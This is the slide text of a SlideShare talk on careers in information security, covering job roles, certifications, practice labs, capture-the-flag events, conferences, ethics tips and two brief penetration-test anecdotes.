Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

A Career in Information Security as Described by Animated GIFs


Published on

This presentation will provide some insights (and funny images) to help explain what life is like in information security and some tips to make you a better candidate for roles. If you're in college and looking to get a few pointers, this may be worth a few minutes of your time to review.

Published in: Technology
  • Be the first to comment

A Career in Information Security as Described by Animated GIFs

  1. 1. A Career In Information Security As Described By Animated GIFs Mark Stanislav <>
  2. 2. Your Presenter, In A Few Bullet Points ‣ 12 years of experience with roles in UNIX systems administration, PHP/Ruby development, and many areas of information security ‣ ‣ ‣ ‣ ‣ B.S. in Networking & IT Administration (EMU) M.S. in Technology Studies, Information Assurance (EMU) CISSP, Security+, Linux+, CCSK certifications Presented for around 50 conferences/groups in past three years Currently the Security Evangelist at Duo Security in Ann Arbor
  3. 3. What Are We Doing? I’m going to talk about having a career within information security! ‣ ‣ This will be done with GIFs from an awesome site found at ‣ Questions are encouraged as time permits. You can always reach out to me afterwards as well via e-mail, Twitter, etc. ‣ Let’s warm up...
  4. 4. Many Roads To Go Down And They Always Converge Even if you start your career as a network engineer, system administrator, or web developer, you can still be “in infosec” ‣ ‣ ‣ Don’t think you have to be an “ethical hacker” to participate or be well regarded in the industry The experience you can gain being in one or more of these roles can result in huge advantages over your security-centric peers
  5. 5. Don’t Believe Me? ‣ Understanding how a technology works by either developing for it or having to defend it puts you way ahead of other attackers ‣ There is entirely too much emphasis on how to use tools in modern information security curriculum -- build stuff/break stuff! ‣ Tools are always getting better so that means you need to continually bring more to the table to be an in-demand hire
  6. 6. Not All Of Information Security Is Hacking ‣ There are plenty of high-paying, somewhat technical jobs in security like being an auditor or on a digital forensics team ‣ The mind set of a hacker can easily be applied within different roles, not just writing exploits or cracking passwords ‣ Information security professionals have many ways they can pivot in a career; don’t get frustrated, be creative with your skills
  7. 7. Roles In Information Security... A Short List ‣ Penetration Testing ‣ Standard/Regulation Auditing ‣ Web Application Security Review ‣ Vulnerability Assessment ‣ Cryptography ‣ Digital Forensics ‣ Security Analyst ‣ Policy Development ‣ Security Architecture ‣ Network Security Engineer ‣ Vulnerability Management ‣ System Security Engineer
  8. 8. Don’t Plan Your Career For One Niche ‣ If you plan your entire information security career around one singular aspect you think you’ll always enjoy, you’re cheating yourself out of a lot of great career paths ‣ Being a “jack of all trades” isn’t a bad thing, it makes you valuable ‣ I call a fixation with one sexy job role “Social Engineer Syndrome” ‣ Social engineering is almost always a part of a job in information security and not a job its self
  9. 9. Information Security Can Be Stressful When you’re working on a client’s network, accidentally knocking over their production server, deleting critical data, or locking their team out can happen if you’re not careful ‣ ‣ Any idea how long you’re going to stay employed carelessly running automated tools? =)
  10. 10. The Reality Of Being An Ethical Hacker What many people think it’s like What you usually feel like
  11. 11. Spending Your Day As An Ethical Hacker A Typical Security Engagement Reports 20% Recon 25% Calls 5% Emails 5% Hacking 45% ...but what it feels like when you own a client’s network and/or data
  12. 12. Certifications ‣ If you’re looking to get your first job in information security, certifications are a great way to set yourself apart from peers ‣ After you have a career, however, most people only get certifications if they have to per their employer’s request/need ‣ Having a certification does not make a person an expert ‣ While we’re on the subject, PLEASE do not put “expert” anywhere on your resume. Seriously.
  13. 13. Learn To Hack And Then Learn To Automate Try to attack an application before scanning it for known issues ‣ ‣ Being able to find an issue rather than being told there is an issue makes a better attacker Once you find a vulnerability, try to write a custom exploit ‣ ‣ Knowing how to exploit a SQL injection issue means way more than knowing ./sqlmap -u Make a “lab” with penetration testing virtual machines to learn! ‣ ‣
  14. 14. Try Your Hand At Security Research ‣ Scour GitHub, Source Forge, and Google Code for applications that contain vulnerabilities... then responsibly report them! ‣ Have an IP camera on your network? How about a “Smart” TV? ‣ Does you company have a security team? Volunteer to test code. ‣ Have friends/family with a business? Ask to evaluate security.
  15. 15. Participate In Team Activities Like Capture The Flag Information Security Talent Search (ISTS) ‣ ‣ DC3 Digital Forensics Challenge ‣ ‣ Cyber Security Awareness Week CTF ‣ ‣
  16. 16. Tips To Maximize Your Career Potential ‣ There are lines to not cross. Don’t break into anything without permission, even if you have the best of intentions in doing so. ‣ Be humble. There are plenty of people who know everything you learn and about 100x more. Humility is a lost art in the industry. ‣ Learn how to explain yourself to non-technical people. It’s not their fault if they don’t understand you, it’s yours. ‣ Don’t say you know “how to hack”... it doesn’t mean anything.
  17. 17. How To Keep Informed, Part 1/2 Pay attention to information security news web sites ‣ ‣ Forbes Security: ‣ Threatpost: ‣ SC Magazine: Read mailing list postings about vulnerabilities ‣ ‣ ‣ Full Disclosure: Follow security professionals on Twitter
  18. 18. How To Keep Informed, Part 2/2 Attend conferences around the area: ‣ ‣ B-Sides Detroit: ‣ Secureworld Detroit: ‣ GrrCon: Attend security meet-up groups: ‣ ‣ #misec: ‣ ARBSEC: ‣ MotorCity ISSA:
  19. 19. Funny Attacker Stories... Story #1: Medical Insurance Company - Penetration Test ‣ ‣ Very well coded web application was the primary point of attack... not much else to go after ‣ Almost gave up when I tried and “became” an administrator ‣ Gave the web developer his own password during the close-out call :) Story #2: Property Insurance Company - Penetration Test ‣ During Open-Source Intelligence (OSINT) gathering via Google, found a development web site ‣ The developer building their new web site had installed a plugin that had a vulnerability ‣ I compromised multiple user accounts and logged into their Intranet and e-mail systems
  20. 20. Thanks! Questions? @markstanislav